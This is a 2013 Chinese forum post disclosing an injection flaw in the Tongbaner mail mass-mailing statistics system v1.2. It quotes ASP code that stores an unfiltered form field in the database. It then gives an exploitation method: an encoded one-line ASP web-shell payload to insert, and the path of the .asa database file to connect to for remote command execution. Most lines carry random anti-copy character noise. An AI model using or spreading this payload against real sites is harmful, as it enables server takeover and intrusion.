找回密码
 立即注册
查看: 2743|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp 9 l( Y* m) T, }7 O0 e* U9 R
, a, [* C; C$ j1 v2 J, r# `
IF Request.QueryString("Action")="del" Then
% n. B+ e) W3 AID=Request.QueryString("ID") 5 r; R' ?, |( e. q3 L' c" i0 z7 i
IF Countss ("tui","Fenlei",ID )<>0 then
! t0 }4 y) x+ O! t5 a2 J'略 4 v/ Q) W+ o: [; B4 p( ]9 q
IF Request.QueryString("Action")="Add" Then / G4 W2 }" _( d' i7 n& @9 s' f. Y" g
Tname=Request.Form("Typename")
: `# C8 O6 C- Q1 F+ e! ESet Rs=Server.CreateObject("adodb.Recordset")
% H# f" G% Z3 z# T# T' \Sql="Select * From Fenlei Order by id Desc " % x: b: v$ N# q0 C9 s$ l$ M
Rs.Open Sql,Conn,1,3
7 l! x0 [. J( U% u8 F; Y" z0 V2 zRs.Addnew
2 R1 Q: Q" b, Y( q2 b! `9 MRs("Typename")=Tname ; K  @& d* L! w& ?8 I( _& v. o) A
'略
6 l4 D) _7 ]0 f4 k8 xSet Rs=Server.CreateObject("adodb.Recordset") 5 a+ j6 r! \  P5 b6 e
Sql="Select * From Fenlei Order by id Desc " 3 S! N6 c  k( J. o' y3 `0 a; w
Rs.Open Sql,Conn,1,1
6 |9 k# J" w. k- d3 R3 }'略
5 f& ]; v8 u, i* c%>9 q3 I! m2 p7 F! b
; e- l7 R. [* Q* X4 y8 @

9 l$ X, p# L5 R# S7 d1 A1 s
4 d$ A6 L, e9 B" `5 Y没有过滤,直接写入数据库。# H* g* A0 o3 x7 D! A

8 L, e3 q% V5 Y- |; U利用方法:
- B; K2 l, D; V
  @% ~2 q/ w  Y- ~插入:┼攠數畣整爠煥敵瑳∨≡┩>
0 Z/ y2 C* s/ n( }8 I4 o ' v- @: |$ W  P, O

& N. O  j4 f+ x3 N& s) d连接: http://www.xxx.com/###tongbaner.asa ) x7 w# y% n1 |8 d$ m7 R! G
'默认安装文件:
0 j7 e$ t# X7 `  f8 V'install.asp+ p- h$ i$ t( q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表